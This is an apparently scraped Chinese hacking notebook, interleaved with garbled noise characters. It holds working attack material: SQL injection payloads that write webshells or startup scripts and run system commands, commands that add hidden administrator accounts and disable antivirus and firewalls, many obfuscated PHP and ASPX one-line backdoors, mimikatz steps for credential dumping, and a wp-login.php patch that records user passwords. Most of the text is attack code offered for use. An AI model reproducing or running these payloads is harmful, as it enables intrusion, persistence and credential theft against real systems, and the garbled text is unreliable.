insert into a values ("set wshshell=createobject (""wscript.shell"") " );
, V% G% M2 _) J1 B+ F X; Kinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
& r0 v+ Y) N2 S& D; Ninsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );, `" d% |& i* m- J) [ x! ?
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";8 v! I, k @! V, ?% s
drop table a;
# p) K+ Q( A6 L, e1 P2 k; p; w" _7 @) b+ Y" t1 h% i' L% O
英文版本:
. a) `5 e7 [/ y2 V" _+ r7 @( @* V: ]: y M, B8 U( b- o! N
use test;; C* L) l/ b8 j; @7 l; Y2 d9 k6 } T
create table a (cmd text);
3 d2 a1 L( Y2 j+ g6 binsert into a values ("set wshshell=createobject (""wscript.shell"") " );
% ]* @8 ?% H* Minsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
$ o" m% Z/ P: x: a5 n# ~insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
; g$ g$ z' |# _0 a' ]select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
1 u E9 f: m2 D# Wdrop table a;9 I& a ~% i$ ` |/ M2 [
P z" o N# R6 M: f) j; A, O2 lcreate table a (cmd BLOB);
@; z) c) ^9 J; N2 pinsert into a values (CONVERT(木马的16进制代码,CHAR));0 a- Z' l$ t2 M: l/ V( Q7 ?1 m
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe' K4 Z$ M0 u0 d
drop table a;
9 I0 ]# |6 ~* {+ n" x- S" s5 ^
2 F) T" u1 m$ j' v& `记录一下怎么处理变态诺顿& b8 ~$ b7 x4 \9 E% _
查看诺顿服务的路径
2 |6 Y0 c4 P' z' Jsc qc ccSetMgr
; v/ I4 w. j6 A, k) w0 ~% w8 g- f+ {然后设置权限拒绝访问。做绝一点。。5 `- R8 u# b' B2 [* o; Q* c
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system" @4 H# W# s. O3 M
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER", v/ x1 e: `) k* |2 e$ m8 u
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators* q. l, ~! w. \- T& X- o% r0 v! N2 w
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
- k$ L$ Z% @& O5 u* c
0 T m$ E$ X" B4 m0 t然后再重启服务器
" C: g+ {: ~% \; |) Miisreset /reboot
( c, ]0 y7 ?" c$ ~这样就搞定了。。不过完事后。记得恢复权限。。。。* @' i/ X$ Y; v' a
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F! X9 R5 G; c6 g+ ]; k
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
7 C; Q9 k# ]; b% P @: Ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
8 w' j( E3 X2 R9 }* T9 G9 U% Qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
" \1 Q* y8 f* W) U ~SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
$ W; N0 O5 e& y* ?. z
* s/ z0 u$ ]: t! g) |EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')& d, s0 U& Y" P$ @& o+ p
' N6 ` |* @5 R) P; z* \6 tpostgresql注射的一些东西
* l: G8 b4 L/ A9 P7 G如何获得webshell
* e0 r4 z& C `5 p p4 ^- |http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); ' C; K( y0 s9 \& j0 c% c
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 0 V" [! v# F" J3 R0 X* t" F
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;; ^/ ]2 _* e' F0 m+ ^
如何读文件$ w& g& \+ u3 r2 `
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);9 Z t% X) X9 }' i; T1 ~
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;8 c* ?. K; F/ g7 s9 E
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
, R R. l8 T1 X% \. w3 B2 a
- N: Z" k& M. _; n' @z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。% v7 c8 x5 K5 A; Z1 W0 j1 L9 I: l
当然,这些的postgresql的数据库版本必须大于8.X4 E* S3 C' _& [# `
创建一个system的函数:
+ ~- i% U) ~% }5 eCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
0 {+ Z2 ]$ |* @$ ~) [+ g2 g+ i
创建一个输出表:
u6 c0 P8 I9 Z2 g: [, yCREATE TABLE stdout(id serial, system_out text)
/ {. R& u, X: u$ S
' c* ?6 D5 z' M& Z执行shell,输出到输出表内:
! [% Z* z; A3 K8 w9 {SELECT system('uname -a > /tmp/test')7 y: N. ]; O# x& L# c
9 M9 ~) J& K) f, w, L! ~copy 输出的内容到表里面;
* ?: l+ N6 g( |; w5 UCOPY stdout(system_out) FROM '/tmp/test'
8 ~2 S! f7 ]" V, C- p0 ^" M& d
2 H+ K8 q, P/ u) J) r3 p* [8 M6 f, q从输出表内读取执行后的回显,判断是否执行成功$ C, Q# X! |5 Y/ q* v
: }1 {- c9 D% m0 @
SELECT system_out FROM stdout% u9 r, L$ D0 t J7 P
下面是测试例子
" Y- L1 f" _ E! f' [5 M3 t1 M- V% ~" n# ~; D& `
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 6 O6 C- Z; N7 h5 x% G/ Y
1 A: t0 f4 f) S: @6 h/ [/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
1 t% O8 t! O. MSTRICT --
0 z d5 h8 K7 H6 j, P1 H4 e7 J
0 r% c Z& W8 T L8 ^% P" |/store.php?id=1; SELECT system('uname -a > /tmp/test') --
, B( \/ ?3 T- x3 L8 J6 X7 f
I7 G1 W9 X) v! `- I! e% n4 f/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --, ^/ R! d5 {8 F! u) F( b
; {* U" }1 J% j2 D" ~/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--# G7 |* a7 y) s& X" L' ~4 @
net stop sharedaccess stop the default firewall( r6 ]9 z$ Z# z W7 d
netsh firewall show show/config default firewall9 c; z( G$ G6 O8 c
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
* b' n% @7 G) O- r& R' S: S8 Q' b5 mnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall% B; ?# ^) S/ T5 ?9 ?+ R8 S+ L E1 l
修改3389端口方法(修改后不易被扫出)7 Y9 ^8 g9 ^" V+ l
修改服务器端的端口设置,注册表有2个地方需要修改
2 `( A y$ w8 L% j* a: f1 c- F+ ~
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]% w0 ?3 \+ s; K$ d/ \1 L
PortNumber值,默认是3389,修改成所希望的端口,比如6000* J. R& u* ^8 L# C1 s! D; g9 a
, F8 _+ c- H' e1 b; c第二个地方:) ~1 m, u8 s5 I: |
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
: Z- @! y+ C0 U$ K+ W* ZPortNumber值,默认是3389,修改成所希望的端口,比如6000
8 `' Q0 R$ H0 a
- W. X1 p3 j# E9 [! `现在这样就可以了。重启系统就可以了
# i- ~! A" n; ~% `2 M7 l' `$ h1 J" h" O+ D3 f* p7 h
查看3389远程登录的脚本
; W* h6 N. ~; n% `保存为一个bat文件( Q1 Z6 @2 S/ S1 j
date /t >>D:\sec\TSlog\ts.log
# K. G) _ y8 T5 w! K( Jtime /t >>D:\sec\TSlog\ts.log2 P9 \- C0 S: F
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
: s- P' Y. n9 ^# S3 ]start Explorer/ K3 v+ b- c, Y- j1 C% N* K
( }; C6 P& v2 ~( x
mstsc的参数:
5 L: w0 p' Y' g4 \4 v% m( ^
' C }* q5 c* P1 H; U' R远程桌面连接$ b# s4 X5 g# q& ^1 E7 t' [4 Q
. K" e, P4 B; N' G' |! J) ~, @7 C1 HMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
' i& E; Y% Z8 l2 g: | [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?" ?9 h7 y+ r( o4 W3 l0 @2 h2 b
0 C" z4 n9 s) e c7 E, {<Connection File> -- 指定连接的 .rdp 文件的名称。: F5 h3 o, ]% z" `
- u! b& e7 \0 ^5 ^8 q/v:<server[:port]> -- 指定要连接到的终端服务器。0 g9 t: \: [5 c/ y. ^7 K. I
5 b0 s7 L7 K4 |/console -- 连接到服务器的控制台会话。
. B$ q; K! J! u- p6 I' y0 l0 \4 H' @! V" B& P& g: S* T% W
/f -- 以全屏模式启动客户端。4 O# G, P6 N- V! V d, j
3 r! @& j# n# J4 F$ W, ]
/w:<width> -- 指定远程桌面屏幕的宽度。; l$ J2 N/ C, A+ W
: Z8 R5 @8 q# q8 @/ j/h:<height> -- 指定远程桌面屏幕的高度。
+ G! c) o5 S0 c7 t9 \( Z! w% d8 B& F1 j$ t
/edit -- 打开指定的 .rdp 文件来编辑。
0 V# e# ^0 ?4 A/ W% S+ R; \. u- r6 i# y
/migrate -- 将客户端连接管理器创建的旧版
# c; d8 V9 O l! h8 N连接文件迁移到新的 .rdp 连接文件。" X( e& g Q' m9 o8 [2 Y
7 U3 i0 T* {3 l8 ?. ~8 g+ w
0 I9 P3 G' a0 ~' g" \4 E其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
. D p3 R" V6 B5 Rmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
2 x5 U+ G+ r2 }0 k( E* J. c" w
; K5 v3 ]- u8 X- h; q命令行下开启3389* W6 V% S& d7 p0 V; w' M+ z
net user asp.net aspnet /add
9 U( e l4 R, t+ \, Tnet localgroup Administrators asp.net /add
6 k% W, n6 T! V( e! F( j1 snet localgroup "Remote Desktop Users" asp.net /add
: _" g0 I: b; _attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D! Y7 Y& i# T# |# a
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0. x9 m0 W. u$ ^$ _$ k9 t0 J" }
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
( i% F. @( b. vecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f) |5 p x3 f. b0 D
sc config rasman start= auto
0 ~" t ~1 y8 n4 [. Psc config remoteaccess start= auto
$ s6 v! q/ H, A* ^! X! I6 znet start rasman
/ E. ~3 @$ C W- |/ N1 w7 ]1 [ Knet start remoteaccess
+ F% c' }* I' R1 }7 M2 L+ QMedia
0 r% _. {$ x5 e<form id="frmUpload" enctype="multipart/form-data"2 z( y$ M1 Q7 l9 p' r) w2 X& o
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>; q( J) w- f& p
<input type="file" name="NewFile" size="50"><br>* }: M- I1 O. k+ I5 |4 o1 c5 V4 s" J
<input id="btnUpload" type="submit" value="Upload">& W" W; d! T* P# x" {
</form>
i2 |: \& n5 a4 Y I4 u: F9 _! e# h; O( {
control userpasswords2 查看用户的密码/ H5 m; F3 I ~; J; [; |
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径. `8 P( ~+ `& T4 i0 ?
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
) `( k V, b9 f. _$ @% |' O& K6 {: _- W( B
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据: I, r* P6 G. ] k K
测试1:
, O, l$ u8 V1 m! N' Q3 N: xSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
( D4 Q) T! m' U% Q6 E* l, @- `: m+ {- X! {8 L9 J5 `
测试2:* {1 i, l. w0 G! j7 n; b$ T
|' t$ E8 f2 g
create table dirs(paths varchar(100),paths1 varchar(100), id int)
; X g9 Y2 O% p- o& g8 \ B4 N1 L/ f. h
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
6 X+ t5 `8 H6 P; |4 q3 v
/ v" S% z4 l0 wSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
! i7 c6 w" J- U8 y$ ]8 [* H关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令) a% P: w D" V3 T7 Q
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;) [* k& Q' `: X' d ]
net stop mcafeeframework/ _$ L$ m+ Q: u- [
net stop mcshield
% C6 k& {9 k1 b& K; Mnet stop mcafeeengineservice
: B( U" T7 b [. W- b* ?net stop mctaskmanager$ D; _0 e6 ]: p
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
0 @: g+ b% O, W6 b& S$ T% }7 v. A" T0 @0 w1 J# d6 J+ d
VNCDump.zip (4.76 KB, 下载次数: 1)
) t. U6 N/ ?/ p/ b% r7 c, O密码在线破解http://tools88.com/safe/vnc.php
; S6 g' U- s! k: g8 `/ D. SVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取2 N4 B4 t* V3 v2 p' ?
# p; F) D% W$ N' H0 s& @9 u! c8 C
exec master..xp_cmdshell 'net user': K, L# j& ?3 @, I: D2 z7 J g
mssql执行命令。
8 d, N- F5 w# X3 v5 ~, E4 W获取mssql的密码hash查询/ @8 ?; d/ ]6 p& f9 @' y6 Y7 Q/ G
select name,password from master.dbo.sysxlogins) z( ?/ y, H# t1 ]5 Y6 |
9 C' s/ l7 s* D$ {. k9 ^# j3 [backup log dbName with NO_LOG;
! y f& V- [1 N8 wbackup log dbName with TRUNCATE_ONLY;3 S- ?0 O: M% {8 D
DBCC SHRINKDATABASE(dbName);7 o: N3 Q+ H" C$ x& o6 M D1 Q
mssql数据库压缩* d' ?. _7 u r- p# \/ N
* p/ l+ o7 I. g3 }
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
4 `- z. j, T( B9 j# t; V将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。" N: g" C5 Y8 ?3 ?: n8 x
# `: C6 C& |! t
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'4 k1 L4 j9 u* ?! |$ ?
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
7 j- \7 c; n. R" v! f6 I/ f
' |0 n! S# [3 R( d i4 l( mDiscuz!nt35渗透要点:
! } t4 T2 Y# f5 L- u* ~' a(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default; i9 B( N2 x i( N/ h2 d2 H# x
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
/ ] O+ Q5 f. _$ V3 k* {(3)保存。
: \( \% E8 B$ ~: j(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass7 P5 I: B/ e5 ~4 [: \. I S) b
d:\rar.exe a -r d:\1.rar d:\website\) u/ n0 u* B! w4 y4 d1 V: h) W
递归压缩website
# z1 l; y8 A5 C& t6 ]1 i' E4 j注意rar.exe的路径
. p" X$ z6 B% H) f# t! Y4 i# n* S) ^2 q% H4 Y, F* c6 I
<?php/ }0 M* _. h/ ^4 T' ~" s c
% d4 E1 c/ k. }# a$ \# e2 p* O, E$telok = "0${@eval($_POST[xxoo])}";$ m8 x& \1 C5 o5 u$ |2 f; X
2 ~; Q' [) [: w* E) \
$username = "123456";: x! e) [/ g+ O
7 Y( n7 ]# ]+ c( O1 H. n. Y/ U$userpwd = "123456";+ Z8 S0 Y* T0 _; [- u/ J+ _8 X( {8 w4 ~
$ b2 x: M. e$ Z/ w* t- b4 i) m
$telhao = "123456";) r2 l: `4 C4 N+ y$ V
% Q+ ^. \6 {: f+ Z5 B) k$telinfo = "123456";
$ h) ]) [8 _: f$ d9 e6 s: f9 A% X# F% \# j: O, @: b4 A* g1 ~7 E
?># b4 F. t& r( x9 c4 ^* r
php一句话未过滤插入一句话木马) O+ \8 {# L0 V
6 n3 w$ [6 W1 n% M站库分离脱裤技巧% i- ~8 ?+ t2 l6 [5 |' N
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
; h7 o9 S" Q' s* Hexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'' X4 ~0 P2 l. H) Q& {% r- O
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
$ G) E- ^& R) Z' F' N& o$ p3 g% T1 y这儿利用的是马儿的专家模式(自己写代码)。
; x+ @0 n0 K% T# S, `2 fini_set('display_errors', 1);7 l3 f( ^9 O5 u; K2 @5 v
set_time_limit(0);
# d# U2 V. q \3 Eerror_reporting(E_ALL);
5 Z; U7 N6 |6 }( C4 I' q, @: q$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
: I( K# r: p( Y6 {mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());7 B7 ]3 b" v* y0 H; d0 a
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());1 \2 x$ J+ M; Q# V
$i = 0;
+ E9 ~8 ~& C) s0 ]$tmp = '';
# B0 {, c2 R' S$ wwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {+ n W7 L) g$ n
$i = $i+1;
) \( W% o, ~& w+ z $tmp .= implode("::", $row)."\n";0 _& ^) `3 z8 r( \6 ]4 V
if(!($i%500)){//500条写入一个文件
) |9 ]) k$ P3 ^: N6 N, H $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt'; _+ W ^/ f7 C0 T2 z* o
file_put_contents($filename,$tmp);) d. X7 _6 ^0 y5 g+ ?6 x
$tmp = '';
& _1 [1 `- n/ s& Z- k }+ j) V! B" e0 i: p, I( z+ _0 s; I
}
* v. E! s' G. H1 T. E: fmysql_free_result($result);
% x- f, l. X5 Y, P% e/ U/ V2 I
& V% e) Z( g% c# q i8 I1 t
- @7 |" W z: ^8 y& y' A D
' V9 r* m. ?, r+ W, n, t4 o" v//down完后delete
3 W! k6 n1 C5 O( Y, _6 z# @& u4 j
, ^8 A. Y1 x( z8 u% Z1 y; o v
; L2 Y3 Y/ b8 w+ \7 xini_set('display_errors', 1);2 P0 d& A0 J% Z' f
error_reporting(E_ALL);& l( ?' Q8 B! R
$i = 0;
% l# B' ]! ?$ c# q* B) kwhile($i<32) {
9 X" M- E2 S. ?. G* o' t% ?: c $i = $i+1;
0 h9 q+ F% y# A! m1 ~+ h( a, d $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';( L. \( y( N8 B( I
unlink($filename);
3 `) X; Y* ]/ [}
$ q4 |- v3 b/ x/ i, Ehttprint 收集操作系统指纹+ Q; k: s5 f5 i$ }* c2 g
扫描192.168.1.100的所有端口
4 f# u) ~! Q- j+ [0 O+ M8 { p" Snmap –PN –sT –sV –p0-65535 192.168.1.100& t1 u* S6 [+ _8 w7 R& }
host -t ns www.owasp.org 识别的名称服务器,获取dns信息 W% D# `) J1 u/ D7 b/ |
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
. c, ~* {& m' A+ o4 I1 U4 UNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host# `* I3 B. v+ H: L+ |) m" ~
4 f. N4 {+ L+ I L( } d
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)4 d ~! u0 W/ ^8 e2 g) v
: j- ^7 ^5 A4 S" m% J( j
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)# K( G% ^& k+ r- [! X8 z
' p' U3 `- w$ u/ ]. B
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x3 w' Q) t8 ]! r& q. Y& `- T3 d5 H
% l8 R" W* z* Z& @: F DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)! T$ S2 v, F1 o0 d1 u" F
2 y' g" z& Z1 ?$ e http://net-square.com/msnpawn/index.shtml (要求安装)" k2 e! U2 Y5 t3 g/ H5 H
0 ~4 T* y" N1 V) ^# Z( L
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)' q! m: }1 `* S1 T+ R; p
: e1 f; Q/ r/ ]4 d SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)! \, [3 ~: M; y& Z& r0 d# s
set names gb23128 x x$ e0 D3 Q- _
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。& H+ ^! {6 D2 K4 Z
/ u# K; x9 u1 E: o/ o
mysql 密码修改
$ h! v: g5 X& P. }9 Y4 aUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
& p; ?. _1 ^ E8 a8 a W/ mupdate user set password=PASSWORD('antian365.com') where user='root';: C, ?+ z7 U/ Y) t
flush privileges;
4 `" ]: z& h3 Q2 M, S% o高级的PHP一句话木马后门
2 ~/ t. h1 _0 V& u4 n/ ^7 O" s W% \( ^7 c o
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
9 M. K2 x/ y; `4 j) ~/ L6 S$ R
* e) r+ o5 q6 h* h0 B1、( I; T# J o8 N% J) I0 E+ G
" o7 j+ j: S- H
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";3 T1 F* q( b! V* j% Y/ O' U
. Q3 M! h4 a6 o6 ^6 k7 A* U
$hh("/[discuz]/e",$_POST['h'],"Access");
7 w0 n* U9 _1 S' \; S- z* q) s' U1 B9 x
//菜刀一句话/ p9 M8 k0 h# g
3 h# b* b3 D( c7 i+ t: N% g# k/ x2、
2 y% K6 c4 P0 ?' o+ m6 d! Q7 B7 `" K# g
$ A" s& ]8 t, U, E- Y. ~$filename=$_GET['xbid'];1 m; \# v" B+ \7 H2 y0 K
6 `! f+ E: G* ~. \& m- f2 r cinclude ($filename);
; G+ [. u. e0 M6 a$ f$ K d; L/ r0 g* ^6 h1 |2 E. w
//危险的include函数,直接编译任何文件为php格式运行
" [" b! Z; P9 q, B8 X9 u6 A: J4 D. ?* y7 D% P
3、
$ b/ u/ r ]$ L! M
. D5 R) S# P" d: B$ F/ n6 z$reg="c"."o"."p"."y";
* _1 C+ t8 e& L& W" V
6 {6 A) b9 |" w$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);7 d* ^, D) L/ s! \- A1 v1 r# I; T8 R
7 P( l# X# q, S: v8 a. e6 G3 E//重命名任何文件
+ \9 M3 Y. U9 K4 J: E8 f3 N4 x- a1 {0 l+ D2 V2 O6 M& U# ?
4、/ F' ?) a( d. j
' W- o0 G- _& V: _/ i% u( _3 i( R: U$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
7 M" u3 O6 ?7 S% l e
% v1 y1 ~8 O) ]# |% O& ~$gzid("/[discuz]/e",$_POST['h'],"Access");' Q4 W% v1 x4 ?3 g8 B8 d
& K7 V) d! `) J# Q0 T5 Y' h
//菜刀一句话5 W6 s! ?0 B1 l9 r$ F/ [! g
; _ o9 z8 V4 L0 v+ }& D% @+ o/ T$ o
5、include ($uid);+ b4 Q3 i0 I* `8 W/ w3 Y9 W( t" d1 G
; C1 G! `( u# ^/ [% V4 ~//危险的include函数,直接编译任何文件为php格式运行,POST * k, m! F# q: _; m! h6 o/ I
' u: F& g# R; Y: Y+ W) ]# }% K( j4 n' a. ~+ E5 A+ v7 \' o
//gif插一句话
. @3 B# a, _% x1 n
9 n2 S4 f2 X$ r" r Y) Q6、典型一句话
T6 Z, V) L' |; C7 c7 i2 r- e- B9 T3 q# e: R: I# D' ]3 f
程序后门代码8 n7 R4 f6 j. Z' a- d4 z
<?php eval_r($_POST[sb])?>
. y; a7 I: J4 R6 n1 Q2 w5 N; x7 u) ~程序代码0 h4 `: s+ e, N2 h
<?php @eval_r($_POST[sb])?>0 T+ B2 Y' p! v1 R+ _% N3 s) O( ^
//容错代码
: s6 ], v8 d; H( ]6 \程序代码3 c3 ]% ?. s8 t' ?
<?php assert($_POST[sb]);?>, r( |3 k6 V! E
//使用lanker一句话客户端的专家模式执行相关的php语句1 l$ u$ E) G# S8 ]
程序代码% T! v9 k" Z6 z- o. Z( b
<?$_POST['sa']($_POST['sb']);?>
. R$ ~4 f) B, l% T& I1 p程序代码
8 R& C. e1 E- f( h: w Y; Z<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
. W6 J" M& T: J* }, c6 w( u3 u- A程序代码
1 C0 P$ _. m5 b<?php
, A. H# E0 z4 M, ?/ @@preg_replace("/[email]/e",$_POST['h'],"error");: p# O4 x& E7 }
?>6 s/ p- F% u# d C
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 U1 W0 [. N6 z' a W
程序代码
8 k w9 H1 I; g# T<O>h=@eval_r($_POST[c]);</O>+ d1 I+ Z* d' ]0 a! D$ o! o7 m
程序代码' ]6 u0 E8 X6 z: K6 z
<script language="php">@eval_r($_POST[sb])</script>* W1 V9 m" a4 y1 a5 [, W2 t
//绕过<?限制的一句话
( Y- i4 ~6 N1 ~9 h
h7 a! s. [, L, Z5 o8 {/ P! }# |/ whttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip/ I6 h5 I* W% i" z
详细用法:. ?9 s' W5 Q- T7 {7 D, ^* b
1、到tools目录。psexec \\127.0.0.1 cmd7 B, Y5 D+ k: l
2、执行mimikatz0 C- o4 ~1 _: I: |: ` G7 M s
3、执行 privilege::debug
& z' i" ~) e7 h+ d1 x, F4 j* Y4、执行 inject::process lsass.exe sekurlsa.dll6 u! c9 k" P" h! u/ T! j5 f1 d
5、执行@getLogonPasswords
, ]/ w5 I# [7 L- W6 O: _- M6、widget就是密码
% a6 G5 P0 L$ o7 K2 C- e7、exit退出,不要直接关闭否则系统会崩溃。: @. e6 c; d4 \3 d
l7 P* @: d6 D$ K1 W2 X
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面: p7 }* ?" q7 N d1 B: l
$ M" M% i" b! L: W自动查找系统高危补丁
$ M! i- J6 F7 i8 a2 Nsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
( l7 m6 d/ V8 D8 K' G+ C# D
% Z( z( W3 } Z' m$ K$ J突破安全狗的一句话aspx后门
# h; ~7 Z. n! I. i9 r% g<%@ Page Language="C#" ValidateRequest="false" %>
. Y7 b- I; [, p) M+ D<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
$ Q* i0 n5 ~( U* ^: [$ xwebshell下记录WordPress登陆密码* ~9 |% t H5 E4 b( b
webshell下记录Wordpress登陆密码方便进一步社工
+ k6 t$ O1 Z# j7 N在文件wp-login.php中539行处添加:
& Z7 o4 d, K+ @- ~ a8 H// log password
3 h9 t/ j% p' o! ]$ d6 C. u7 \$log_user=$_POST['log'];
; {( d, ]6 K5 Z) d# B" H8 e$log_pwd=$_POST['pwd'];
7 }. D4 R3 \' d/ y: E0 S3 Y; B/ T* M$log_ip=$_SERVER["REMOTE_ADDR"];, N! l1 h* g4 O$ i# r6 u" S; t1 K
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
, G' v/ ^5 x$ V! ]$txt=$txt.”\r\n”;
+ G5 b4 p; q1 i0 L$ R* v5 J. }if($log_user&&$log_pwd&&$log_ip){1 ]: l( c9 c7 l" D" m" W
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);, H3 K5 S% i) l' s
}
9 N5 L2 q6 P; N$ o+ m当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
7 H3 ]" V; }5 r [6 z5 i% S就是搜索case ‘login’
